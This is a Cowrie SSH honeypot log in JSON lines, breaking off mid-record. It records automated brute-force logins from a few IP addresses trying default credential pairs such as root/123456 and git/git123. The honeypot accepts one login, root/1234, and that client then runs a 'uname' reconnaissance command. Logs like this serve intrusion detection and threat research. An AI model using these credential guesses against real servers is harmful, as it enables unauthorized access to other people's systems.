{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:34:27.404925Z","src_ip":"212.227.125.160","session":"de5b9bd3ffad"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:34:27.817207Z","src_ip":"212.227.125.160","session":"de5b9bd3ffad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43022,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d538462f6b7","protocol":"ssh","message":"New connection: 212.227.125.160:43022 (1.2.3.4:22) [session: 4d538462f6b7]","sensor":"my-vps","timestamp":"2025-08-28T05:34:28.012483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:34:28.013151Z","src_ip":"212.227.125.160","session":"4d538462f6b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:34:28.116999Z","src_ip":"212.227.125.160","session":"4d538462f6b7"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:34:28.429951Z","src_ip":"212.227.125.160","session":"4d538462f6b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:34:28.850137Z","src_ip":"212.227.125.160","session":"4d538462f6b7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:34:28.850962Z","src_ip":"212.227.125.160","session":"4d538462f6b7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:34:28.959789Z","src_ip":"212.227.125.160","session":"de5b9bd3ffad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:34:28.961111Z","src_ip":"212.227.125.160","session":"4d538462f6b7"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:34:28.962213Z","src_ip":"212.227.125.160","session":"4d538462f6b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54116,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d5583ac2c25","protocol":"ssh","message":"New connection: 212.227.235.229:54116 (1.2.3.4:22) [session: 4d5583ac2c25]","sensor":"my-vps","timestamp":"2025-08-28T05:34:34.467279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:34:34.468166Z","src_ip":"212.227.235.229","session":"4d5583ac2c25"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:34:34.612133Z","src_ip":"212.227.235.229","session":"4d5583ac2c25"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:34:35.046065Z","src_ip":"212.227.235.229","session":"4d5583ac2c25"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:34:36.193477Z","src_ip":"212.227.235.229","session":"4d5583ac2c25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51046,"dst_ip":"1.2.3.4","dst_port":22,"session":"304365c120cc","protocol":"ssh","message":"New connection: 212.227.125.160:51046 (1.2.3.4:22) [session: 304365c120cc]","sensor":"my-vps","timestamp":"2025-08-28T05:34:41.908553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:34:41.941659Z","src_ip":"212.227.125.160","session":"304365c120cc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:34:42.023139Z","src_ip":"212.227.125.160","session":"304365c120cc"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-28T05:34:42.426018Z","src_ip":"212.227.125.160","session":"304365c120cc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:34:43.535215Z","src_ip":"212.227.125.160","session":"304365c120cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42646,"dst_ip":"1.2.3.4","dst_port":22,"session":"befa6a77db55","protocol":"ssh","message":"New connection: 212.227.235.229:42646 (1.2.3.4:22) [session: befa6a77db55]","sensor":"my-vps","timestamp":"2025-08-28T05:34:52.372063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:34:52.372870Z","src_ip":"212.227.235.229","session":"befa6a77db55"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:34:52.518069Z","src_ip":"212.227.235.229","session":"befa6a77db55"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-28T05:34:52.957399Z","src_ip":"212.227.235.229","session":"befa6a77db55"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:34:54.104769Z","src_ip":"212.227.235.229","session":"befa6a77db55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40628,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fd4386d589e","protocol":"ssh","message":"New connection: 212.227.125.160:40628 (1.2.3.4:22) [session: 9fd4386d589e]","sensor":"my-vps","timestamp":"2025-08-28T05:34:56.774076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:34:56.798121Z","src_ip":"212.227.125.160","session":"9fd4386d589e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:34:56.881070Z","src_ip":"212.227.125.160","session":"9fd4386d589e"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom123","message":"login attempt [tom/tom123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:34:57.304349Z","src_ip":"212.227.125.160","session":"9fd4386d589e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:34:58.412031Z","src_ip":"212.227.125.160","session":"9fd4386d589e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53732,"dst_ip":"1.2.3.4","dst_port":22,"session":"c374ae447255","protocol":"ssh","message":"New connection: 212.227.125.160:53732 (1.2.3.4:22) [session: c374ae447255]","sensor":"my-vps","timestamp":"2025-08-28T05:35:11.915412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:35:11.946823Z","src_ip":"212.227.125.160","session":"c374ae447255"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:35:12.024927Z","src_ip":"212.227.125.160","session":"c374ae447255"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:35:12.444822Z","src_ip":"212.227.125.160","session":"c374ae447255"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:35:13.560872Z","src_ip":"212.227.125.160","session":"c374ae447255"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49594,"dst_ip":"1.2.3.4","dst_port":22,"session":"44891adabbf8","protocol":"ssh","message":"New connection: 212.227.235.229:49594 (1.2.3.4:22) [session: 44891adabbf8]","sensor":"my-vps","timestamp":"2025-08-28T05:35:19.194205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:35:19.195113Z","src_ip":"212.227.235.229","session":"44891adabbf8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:35:19.336980Z","src_ip":"212.227.235.229","session":"44891adabbf8"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:35:19.765736Z","src_ip":"212.227.235.229","session":"44891adabbf8"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:35:20.910542Z","src_ip":"212.227.235.229","session":"44891adabbf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43066,"dst_ip":"1.2.3.4","dst_port":22,"session":"027be834d80a","protocol":"ssh","message":"New connection: 212.227.125.160:43066 (1.2.3.4:22) [session: 027be834d80a]","sensor":"my-vps","timestamp":"2025-08-28T05:35:26.728892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:35:26.763793Z","src_ip":"212.227.125.160","session":"027be834d80a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:35:26.842607Z","src_ip":"212.227.125.160","session":"027be834d80a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61448,"dst_ip":"1.2.3.4","dst_port":22,"session":"f99331117571","protocol":"ssh","message":"New connection: 217.72.205.35:61448 (1.2.3.4:22) [session: f99331117571]","sensor":"my-vps","timestamp":"2025-08-28T05:35:26.869966Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:35:26.870987Z","src_ip":"217.72.205.35","session":"f99331117571"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123","message":"login attempt [git/git123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:35:27.255284Z","src_ip":"212.227.125.160","session":"027be834d80a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:35:28.438931Z","src_ip":"212.227.125.160","session":"027be834d80a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39680,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b02d7820a81","protocol":"ssh","message":"New connection: 212.227.235.229:39680 (1.2.3.4:22) [session: 7b02d7820a81]","sensor":"my-vps","timestamp":"2025-08-28T05:35:35.089120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:35:35.090283Z","src_ip":"212.227.235.229","session":"7b02d7820a81"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","